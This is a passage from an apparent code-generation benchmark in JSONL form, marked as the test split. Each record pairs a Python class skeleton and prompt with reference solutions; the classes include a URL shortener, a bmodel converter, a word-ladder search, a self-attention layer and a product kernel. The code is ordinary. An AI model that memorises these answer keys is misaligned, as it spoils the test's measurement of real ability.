decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. 
Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n", "source": "the_stack_v2_python_sparse", "source_path": "String/023_geeksforgeeks_Design_a_tiny_URL_or_URL_Shortener/Solution.py", "source_repo": "Keshav1506/competitive_programming", "split": "test", "star_events_count": 0} {"blob_id": "32c1571a62386f6d4fb490056be5dc4bfd9763d7", "bodies": ["super(PytorchGraphConverter, self).__init__(framework, base_path)\nprint('{} bmodel converter init'.format(model_name))\nself.model_name = model_name\nself.models_path = models_path\nself.shapes = shapes\nself.dyns = dyns\nself.outdirs = outdirs\nself.nets_name = nets_name\nself.target = target\nassert len(self.models_path) == len(self.nets_name)\nassert len(self.models_path) == len(self.dyns)\nassert len(self.models_path) == len(self.outdirs)\nself.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\nif not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)", "print('generate {} bmodel...'.format(self.model_name))\nfor i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\nos.system('rm -f ./bm_multi_engine_stas_0.dat')\nos.system('rm -f ./*.grp')\nprint('generate bmodel {}'.format(self.output_base_path))"], "bodies_text": "<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "class_docstring": "pytorch graph bmodel converter", "class_name": "PytorchGraphConverter", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, 
dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000424", "length_bytes": 15723, "license_type": "permissive", "methods": [{"docstring": "Init pytorch graph bmodel converter", "name": "__init__", "signature": "def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target)"}, {"docstring": "convert pytorch graph", "name": "converter", "signature": "def converter(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001013", "prompt": "Implement the Python class `PytorchGraphConverter` described below.\n\nClass description:\npytorch graph bmodel converter\n\nMethod signatures and docstrings:\n- def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target): Init pytorch graph bmodel converter\n- def converter(self): convert pytorch graph", "prompted_full_text": "Implement the Python class `PytorchGraphConverter` described below.\n\nClass description:\npytorch graph bmodel converter\n\nMethod signatures and docstrings:\n- def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target): Init pytorch graph bmodel converter\n- def converter(self): convert pytorch graph\n\n<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n 
os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "revision_id": "c9fa07851da663dda4953dba72e1d3937299a4ea", "skeleton": "<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n", "source": "the_stack_v2_python_sparse", "source_path": "modules/utils/bmodel_converter.py", "source_repo": "sophon-ai-algo/sophon-inference", "split": "test", "star_events_count": 32} {"blob_id": "183fb174054ec2e9c074afbb65c00a7ef0287c04", "bodies": ["if not beginWord or not endWord or (not wordList):\n return 0\nstate_d = self._construct_dict(wordList)\nreturn self.bfs(beginWord, endWord, state_d)", "res = {}\nfor w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\nreturn res", "queue, visited = (deque([(beginWord, 1)]), set())\nwhile queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\nreturn 0"], "bodies_text": "<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, 
state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "class_docstring": "This solution uses a hashmap to store all the state spaces Use more space for less time", "class_name": "Solution2", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000425", "length_bytes": 2492, "license_type": "no_license", "methods": [{"docstring": "main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps", "name": "ladderLength", "signature": "def ladderLength(self, beginWord, endWord, wordList)"}, {"docstring": "convert wordList into a neighbor dictionary of list :param wordList: :return:", "name": "_construct_dict", "signature": "def _construct_dict(self, wordList)"}, {"docstring": "bfs :param beginWord: :param endWord: :param state_d: :return:", "name": "bfs", "signature": "def bfs(self, beginWord, endWord, state_d)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution2` described below.\n\nClass description:\nThis solution uses a hashmap to store all the state spaces Use more space for less time\n\nMethod signatures and docstrings:\n- def ladderLength(self, beginWord, endWord, wordList): main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\n- def _construct_dict(self, wordList): convert wordList into a neighbor dictionary of list :param wordList: :return:\n- 
def bfs(self, beginWord, endWord, state_d): bfs :param beginWord: :param endWord: :param state_d: :return:", "prompted_full_text": "Implement the Python class `Solution2` described below.\n\nClass description:\nThis solution uses a hashmap to store all the state spaces Use more space for less time\n\nMethod signatures and docstrings:\n- def ladderLength(self, beginWord, endWord, wordList): main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\n- def _construct_dict(self, wordList): convert wordList into a neighbor dictionary of list :param wordList: :return:\n- def bfs(self, beginWord, endWord, state_d): bfs :param beginWord: :param endWord: :param state_d: :return:\n\n<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "revision_id": "2c534185854c1a6f5ffdb2698f9db9989f30a25b", "skeleton": "<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n\n def _construct_dict(self, 
wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Week 03/id_118/LeetCode_127_118.py", "source_repo": "Carryours/algorithm004-03", "split": "test", "star_events_count": 2} {"blob_id": "230f5f17b1dc1a7d637581d25d54f89adaa38d6f", "bodies": ["super(SelfAtt, self).__init__()\nself.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\nself.bmm = ops.BatchMatMul()\nself.softmax = ops.Softmax()\nself.scale = Tensor(n_out, ms.float32)", "query = self.query(x)\nkey = self.key(x)\nvalue = self.value(x)\nalpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\natt = self.softmax(alpha)\nout = self.bmm(att, value)\nreturn out"], "bodies_text": "<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "class_docstring": "Self-attention.", "class_name": "SelfAtt", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000426", "length_bytes": 9199, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- n_in : int input dimension. 
n_out : int output dimension.", "name": "__init__", "signature": "def __init__(self, n_in: int, n_out: int)"}, {"docstring": "Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].", "name": "construct", "signature": "def construct(self, x: Tensor) -> Tensor"}], "n_methods": 2, "prompt": "Implement the Python class `SelfAtt` described below.\n\nClass description:\nSelf-attention.\n\nMethod signatures and docstrings:\n- def __init__(self, n_in: int, n_out: int): Parameters ---------- n_in : int input dimension. n_out : int output dimension.\n- def construct(self, x: Tensor) -> Tensor: Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].", "prompted_full_text": "Implement the Python class `SelfAtt` described below.\n\nClass description:\nSelf-attention.\n\nMethod signatures and docstrings:\n- def __init__(self, n_in: int, n_out: int): Parameters ---------- n_in : int input dimension. n_out : int output dimension.\n- def construct(self, x: Tensor) -> Tensor: Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\n\n<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "revision_id": "eab643f51336dbf7d711f02d27e6516e5affee59", "skeleton": "<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. 
Returns ------- out : Tensor [..., size, dim].\"\"\"\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n", "source": "the_stack_v2_python_sparse", "source_path": "research/gnn/nri-mpm/models/base.py", "source_repo": "mindspore-ai/models", "split": "test", "star_events_count": 301} {"blob_id": "4b4163e1eca0a5a521cd743c8ecbe6d1c932fdd9", "bodies": ["self.vartypes = vartypes\nself.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\nself.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\nself.conti_bw_temperature = config.conti_bw_temperature\nself._fit(data_ref)", "self.data_ref = data_ref\nself.bandwidths = []\nfor k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)", "gram_matrices = []\nfor k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\nreturn np.array(gram_matrices).prod(axis=0)"], "bodies_text": "<|body_start_0|>\n self.vartypes = vartypes\n self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\n self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\n self.conti_bw_temperature = config.conti_bw_temperature\n self._fit(data_ref)\n<|end_body_0|>\n\n<|body_start_1|>\n self.data_ref = data_ref\n self.bandwidths = []\n for k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)\n<|end_body_1|>\n\n<|body_start_2|>\n gram_matrices = []\n for k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\n return np.array(gram_matrices).prod(axis=0)\n<|end_body_2|>\n", "class_docstring": "Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html", "class_name": "VanillaProductKernel", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VanillaProductKernel:\n \"\"\"Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\"\"\"\n\n def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()):\n \"\"\"Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). 
# --- VanillaProductKernel ---
# Source: diadochos/incorporating-causal-graphical-prior-knowledge-into-predictive-modeling-via-simple-data-augmentation,
# causal_data_augmentation/causal_data_augmentation/augmenter/admg_tian_augmenter/util/weight_computer/kernel_fn/vanilla.py

class VanillaProductKernel:
    """Product kernel object.

    Notes:
        Bandwidth methods: ``statsmodels.nonparametric.bandwidths``:
        https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html
    """

    def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig = VanillaProductKernelConfig()):
        """Constructor.

        Parameters:
        data_ref : Reference data points for which the kernel values are computed.
        vartypes : The variable types ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``.
        config : The configuration object.
        """
        self.vartypes = vartypes
        self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)
        self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)
        self.conti_bw_temperature = config.conti_bw_temperature
        self._fit(data_ref)

    def _fit(self, data_ref: np.ndarray) -> None:
        """Fit the product kernel.

        Parameters:
        data_ref : ndarray of shape ``(n_obs, n_dim)``, the kernel centers.
        """
        self.data_ref = data_ref
        self.bandwidths = []
        for k, vtype in enumerate(self.vartypes):
            bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')
            if isinstance(bw_method, str):
                bw = self.BW_METHODS[bw_method](data_ref[:, k])
            else:
                bw = bw_method(data_ref[:, k])
            if vtype == 'c':
                bw = bw * self.conti_bw_temperature
                if bw == 0:
                    bw = MINIMUM_CONTI_BANDWIDTH
            self.bandwidths.append(bw)

    def __call__(self, data: np.ndarray) -> np.ndarray:
        """Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``.

        Parameters:
        data : ndarray of shape ``(n_data, n_dim)``.

        Returns:
        ndarray of shape ``(n_data, n_data_ref)``.
        """
        gram_matrices = []
        for k, vtype in enumerate(self.vartypes):
            func = kernel_func[self.kertypes[vtype]]
            gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])
            gram_matrices.append(gram_matrix)
        return np.array(gram_matrices).prod(axis=0)
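The class leans on three module-level names the record never defines: `BW_METHODS`, `MINIMUM_CONTI_BANDWIDTH`, and `kernel_func` (the `VanillaProductKernelConfig` class is likewise external). A minimal sketch of plausible definitions follows; the particular bandwidth rule and kernel choices here are assumptions for illustration, not the source's actual API:

import numpy as np

# Illustrative stand-ins for the module-level objects the class references.
MINIMUM_CONTI_BANDWIDTH = 1e-6   # floor applied when a continuous bandwidth collapses to 0

def _bw_silverman(x):
    # Silverman's rule of thumb for a 1-D continuous sample.
    n = len(x)
    return 1.06 * np.std(x, ddof=1) * n ** (-0.2)

def _gaussian(bw, x, y):
    # Pairwise Gaussian kernel; broadcasting (n_data, 1) against (1, n_ref)
    # yields the per-dimension Gram matrix that __call__ multiplies together.
    return np.exp(-0.5 * ((x - y) / bw) ** 2)

def _matching(bw, x, y):
    # A simplified categorical kernel: weight (1 - bw) on a match, bw otherwise.
    return np.where(x == y, 1.0 - bw, bw)

BW_METHODS = {'silverman': _bw_silverman}   # consulted when a bw_method is given as a string
kernel_func = {'gaussian': _gaussian, 'matching': _matching}

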